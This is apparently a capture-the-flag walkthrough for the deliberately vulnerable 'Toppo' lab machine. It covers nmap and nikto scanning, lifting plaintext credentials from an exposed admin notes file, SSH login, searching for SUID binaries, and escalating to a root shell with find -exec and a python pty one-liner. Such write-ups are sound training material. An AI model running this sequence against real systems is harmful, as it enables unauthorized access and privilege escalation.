﷽
Machine : Toppo
Duration : 15-20 Minutes (approximately)
Meet Toppo ...
1. Preparation :
Check my own IP.
ifconfig
Discover neighbours IP.
nmap -sn 192.168.56.0/24
2. Enumeration :
nmap -sC -A -p- 192.168.56.105
Found several open ports 22, 80, 111 & 58733. Lets try to browse the web server service (tcp/80) :
Meanwhile ... also look for any possible exploits for the identified services :
OpenSSH 6.7P1 (tcp/22) :
Apache httpd 2.4.10 (tcp/80) :
Examine web server : nikto -host http://192.168.56.105
and found admin directory and then mail.
Accessing admin directory which is in listing mode :
Inside admin directory, we found text file notes.txt, which might content user and password information.
Possible user and password information :
User : ted
Password : 12345ted123
Performing access using ssh service, and got low level shell access.
Identifying system : uname -a and cat /etc/issue.net
Searching for usable executable files which authorized for user ted.
find / -perm -u=s 2>/dev/null
Python is potential escalation vector, but first lets try using find.
find / -name sp8 -exec /bin/bash \; or find / -name sp8 -exec /bin/sh \;
Failed attempt using find, lets try using the well known python shell spawn.
we can use python oneliner like python -c 'import pty; pty.spawn("/bin/sh")' or running python script.
echo 'import pty; pty.spawn("/bin/sh")' > sp8.py
python sp8.py
Finish ...
Thank you and Greets Hadi Mene.